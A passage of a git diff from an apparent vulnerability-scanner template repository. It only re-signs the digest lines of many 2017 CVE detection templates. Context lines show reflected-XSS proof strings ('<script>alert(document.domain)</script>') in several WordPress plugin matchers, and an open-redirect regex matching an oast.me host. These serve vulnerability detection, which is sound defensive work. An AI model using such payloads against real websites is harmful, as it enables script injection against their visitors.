4a0a00473045022100828e4fcd424bd9ace343e46f8638dfd3c98669346297095a539c3a73737b30cc02200f2fd1fa4b5766d172ba09008728788b5b375c4373d3f8166751554ccbaad40c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index ffac334e3b..79c0e76f41 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a7e846889ca9fef021f58b756f7db9e533f0fd2b079699079c49a442f3a817302200cac7efeb08c7927aba913cf747c76517a5bc78708c560f54c0cc97f9bad6598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9aea2d3b863eb9e683ecc823a4f5e3e8136f7b965fb0c3655538bdf440bcf3d02207491b538b2e590ae2204dc89543ee472e37827f2ef6fe8be39b73d8d715eff34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index cf158721ed..99dbd027d6 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220379d0c5f5c4e19ce0caab699ea5aa078fc15bd35974269774e64b108806b79be0220532d269649aaacb9e369acb9a5d57da778c6df5d4a0afa2976c71e42e63a865c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052d27ec94a5bec175557a6fa3ad9b58f2103d21b5701bffe972374a2a558f4ef0221008fea90ecc31126ba54f54ceb9000e1e65a774c4fb14d9d59205a1e3034977658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 86993059e5..fc1bc7621a 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc85f49c32a20468afb964c828ef9f1807574d73dfa35714c5dccfd65af2968002210086f149634411289cfa9719c91807a76b9ee9cac520f34c029197b4e250aa1f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 535be66581..f1a7dc0fed 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -54,4 +54,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4b0a00483046022100d4ea117d6f8a9a0bca004f0dd6abfb5a07ccac04c694a225786fb4891966d967022100e00d1081ae2657e9248dc91e946a1ff3d4745375c562b0273a375d31b5fe26c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204330e587ad6ed4278528de81d1036e457ce5f98dcbea54a5a68c136afad1a517022100bf95a11942363e362e6d5c911e5424746f92f4b7389d1dfa3dae055421ae4761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 53f14a8754..731c1e9791 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -64,4 +64,4 @@ http: status: - 201 - 409 -# digest: 4a0a0047304502203addb2b6e215dbff5fb9d55765b537597f5a37384aa1a41b3cdc23deecc6650a022100a8103420fbf062ce4677bc443e076baa92d8b4301fda6d2729268d370c359b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc6b8be9a2ae1adc600c103d9514a8a50b5ac05c0df9a3fff1d28ca643eea796022100cb77ea8c8138c7732c50f2462c4e131464f690c8b863c34b390b36042313667b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index d037475149..52bed4ee3f 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204718a1f0fc5fb3d6d079a6f410f3203c6081f696613bfb4167a3aedfc56fb25f0221008e2ab021c906aea464f0dacae54694f30f2fa359573d32c35a6dda81f4e2204d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201eb1ef093708f91644f0c82c0d9c6777d4c6c74bac87d6825dbfae9b9c1c3e0c022100a426d0ad10d5f240c23ef2366faa7bac5d05066a4bd437841b5b5117c7133f78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 6ab7cbf571..e601acc5ff 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022045d37d6d95dbcf0d99b3dd98b0548af3f80775282906963e91de53ddd88178e102207fef1b1e81deb1e461760619d1398e0d670d6ad1cb6109983598f16783a68676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efedfed019372fabd4ec462ca8128065b5c74513db3e9e565a9f74f45b7714c802206c5fe554f4a89a675c078661b0ad020fd9ccad466d1ecd821a5632bbc74749ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index f4e2e467ab..7034429878 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a852b1b32792544b5b6f8d6a8e27f16fa2a21752d6257b99b98f4f76d92371c5022100ab03304decd9205f9b33ce74fd73fc0d5bf2996b53a7ad8af64aa0f5d8cca2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index a3263f8883..f49b0dfc9b 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bc3674dee1eb49c44df21ca6983aefdd561fa760cf2dc5b0511f8a420c15d9d022100be38b58aec0bb2d0baa6e086131178429de65c611eaed9a9e3a705252ed355aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index e4e58c7c93..aab178fe4e 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d0c495d738c812d3814d912d4d9a15c2068f31549dd5a6094fc26ff7e3fea5f022100bd6cecc315841b445bfd54e0577138bc398e39992b4fd808404389443dc7984c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 807a3466db..f73440c041 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004c2c0b0bfc6a4b5299eb051ed30519d948e89244430b213fad2de42968d5d0602207a33257c46086bb05aa71c1e223813644d52d434ee6d268a0c78b20851101d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220212a0e411a7dfdddc9cefecce4b3e6da4e1d9ab9798165a2e1bdeb040a9f841a022100a563dc32c6b5450a3e77b949621ad22bde185127feaa4fe3221a49c5f800c6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 93c4d4edee..be742d8764 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "<script>alert(document.domain)</script>")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068ae0e1c39c551c92415126fbe3278656ee8caa5459408d8cfb363321b1cfbe302203012f89152ceecc895732bca30da0ba6495ef79ff4f0a96af28e2a8a71e423b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 2e53ed8d0e..aaa705abb8 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -50,4 +50,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a8055a3c4f6a207fcbcbc251ad23ae0ca38a2c9274678e60f4d7f6794372f2b02203f743b45bed131ec4e534021b68216b4b0c4b0f37fd85ee60a3bb6258e21fbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 6684332084..5ba1da6df7 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091a03fe8bc062a8f4ab9b7ce6642025c5599951a009a17ed9ef4ffe4e24c7ccd0220570d8f49b671763897be8c2893f0da5b7e725eaa8a75b1d33581fc1327547dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc70e1874f9cb05ffce4e903656bec52da2f4c00911ce81bf12be3d78825a7740221008cc52739137460a82d8edee7d9310d0397e83e70cc1bd5c4934b0a662204180d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 7d33bbe2f5..d40588030d 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -57,4 +57,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 4b0a00483046022100ae5641ddd92e3d444dbbb35c3b15e833ad880957167aa6fad3e696b3f05e57d6022100a1460cf01679d7a517dba54d83abe3fa648044075c4c3c88058ee7687bb5a231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5b95914f4e3f82442439819350bfd0593af2bcbe7c4d94b1f3675ef1b8e5f7e0221008e6d536d529afde82250bb64cee8c324357d63dd2d4b090af6bdac0951e85760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index c29e2c2cc8..6353771b11 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e0ebb82c78017bace95bb6bdbbd956c0ceefa723b30e23eaf66e133c3671020b02201e43c7c0e0a433896c4df5cfcc72d35bc21c5ead69bbb1c20e4903dc8d6705a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b6986aaa6889e0462da1d7774c50f898c54663ba26b806cbbb8d02f7f8620f2022000dcf8a3535abbb6d12f598df23e35247ff5fcfca180b1025dd7bc918e855643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index ab3f62c861..00fbc8046d 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220248d3a025910d7531fbfc6d9b3fa5dc68f2b52eb6ee83db505034ca0c5eaf5b6022073f53caec34066a4d897600b5ab38dd8983378f8db55127c30cc96bc041d373e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 6454c291c4..18eff63188 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c250b9c908590d5296d8fd48225795617103cff1b0a0082f49eccc4317ef7c2e022100f718c49e8cd4c13a059b632b35040a5391bb6a6714822a1348371aa8b2d51137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9730b947db3bb1357d5caa71c56f2d389c56fa519be8a994ae6d432533f49be022002444ed6379e5c2600c10f50fb2580bd67bf226204375dac092d07dbbca2d1f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 8be78e7854..1bad04ee13 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203013773f07b32293d187ef5593c809c0d5b199d0535add43a30b9558d54ad34b0220793cad7ec1c8c9661bbcec6319fcac9cd92006ed78d1f46ccc76dca5de51cb18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031c15c11202c7964366d60e629a94726935eb45208e9d1342418855dd021e4fc022100a7b7f0a3a0ab2dbcad54dc28a88cbfbb1b98b72d7b8dcfd03519b8a935dd99de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 3a686685aa..81239b67f7 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074f0b24a9cb480e81960e319cc7ee19b77dec9226fe67fb84ef549e875531ccb022100d2da121efbde5f1678796a09a5a402923ee1a4b01df208e0d978251d20b71f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f214539df64786c3d52922e14c4c9d2e8766c6bed71928bb04a9c9dc07fb4e53022100e31456e1f51b587f652c6f75dd3239fd76a2a90af5b0c6fa4b9ed64469bbc8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index be3d789c42..e4bd532644 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec046f9a81c101fb374ae81bf7e992adeec3cc8e98a3583295368cde81c2129e022100a1232b8f02f87a0a260815390cb7e841d202487f1b339d81ed1212cc8af179de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0ddbaf09b68c68b39dfffbe86e40890a1e47752592d33d12f9defe516d7f841022100962efc1e1ab9bd391c8f3f57a1671572a0750fefa25c9c3a2e86d2c923275973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 46a33424f9..364410874d 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -118,4 +118,4 @@ http: - type: status status: - 200 -# digest: 480a004530430220137571f29820e7cfeff24983e553083fbd48df32ed6c9f6be7ab7a0b2ab3dcec021f1cf2aba6f6d18369d6d6d6784a620d36863b9446b26c941818edd6a6a12322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0718d9f04bc6d15d22ac54b93c6f567b67f15d01f50cee17d7f3571416b85140220106a40ed475fcb76830332c3c1044593fc378ecc06198d8f747cee8305851a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 7d98aa51e1..7ee2be835e 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -53,4 +53,4 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 4a0a00473045022100ad66c367e331e508a9f4b8fa4a02f983e9f099aeadd13065ad5c5afce55ef49c022066cea12a22089ef4211b14cd43c45a6ee5a3d7ba24ae488ba1f0f9d108f68fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8ad1f8a03b92de7bc6cebf760d69d12729198d8fcbfa54e5e09cd9e4cfe1aba022100bc14286072cd2f87dad9e6d870daeac4050ae6d77f50a967de331b947f904ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 14024f2780..4e6e16b60b 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e15727b0ddf652065861bf22bea1c0e93ae8134932a63f1691a2256adbd1b25602201f24ab36ca2f64094ec81fa3f92890da072058fd9f23c5802569ecd06afcb00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf464ae1865ebdfc07eca5805af2e4ef8b10d1f7751f62adb5de2c0c9476687602207e8e107717c8972c0c2a91ccf68984488b5bf04de54c3e3bdfd1598beacbf8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index dca5028bfe..c57bb085a4 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2f144543f909a5615a872d0bd6f175f8d7481b76040c77d249082c14cdd77b5022100a45e78dd4bacbe1a90ff470b53c32cb5747094df301236a60c0aa95bbbb15a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 66e01c1136..fe6fceb759 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220309d50219f298d7eea07a19c9191ff46c8a45c69b74b58d89a0ad909e927783f022057edf5a64e245323e5dd0e27cbc7b15cc446f824ab7fc1cd11d7ccf9bd8c0a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 964c52810f..647c706979 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205922464cb9b082012a5717f6ae4a5c781c09d72276c4a13f00c395e2341c4940022100c3b722a4063eb9e67e300cbbc803ae02cdfd639fc0a887d6ed676e3a54f6ed23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index bcc3055173..0e3351d0c6 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6bb8513bced954e51008a530b0724db84f61bb3f0b140ea5002a674017aca9002204ee548db86017b15989be9df5eb8e52e0e4f1a68864352638af2ad67bcc245c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index b3f94004bc..19c0261467 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6fe80f9f7d1aab556e1036f8defebeba6ea11c63f16d34b04afe90e95f4546202200808bf2577b4a08b4780aadbaa4011e1d3f8550e44937ddcb47fe5b3d221cb83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 3ca18d781a..6efe86ae09 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206317d36f774a6e18918ff1f1e37f50249a0ce640d5a5516998ede088be17bb1a022100f0d31a71b6bc8cf142d888decd4c4a769997873f78303ea4b9a06ea6be1581e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index c4586cd270..6b6cb879c5 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d15d88b20dc2025c1222de29bcdcb7f8e8d30287102244dd47259b4709bdd539022074e861018f6c2c65de07cd24dab9c02ffea05aec9e96e88314e17857f73270eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index cc7a41659f..47d08c7d21 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e023710fd2cddcb7031ad7fba8662510eaeed9e5faafbd42d85dd970f2d8ee0202202366661999f0a17500a912412bd4d032a998c89376f68bf9607137adec9e75e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index faa0193501..7af4ac0a0d 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b926cdd9c0ccc5dd9db56d2d1011d94f6bcb665e4215f9b90fc954268a35f671022100fa7f0cc871a66086020b70e8d3c2f1f862fe6497f6174e0101aa0c4c9b9bedd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index a2da2b6576..702e3f5399 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e4b864003dd64c21ddbc07de1eae42df292cce45d23b04ff0a705050c7d6fee022069151f539cdd3d0ffcc2d3de11e35b01a3f9d076a033bc2f9506cedef12a0431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index cea2025592..58b79a5aef 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 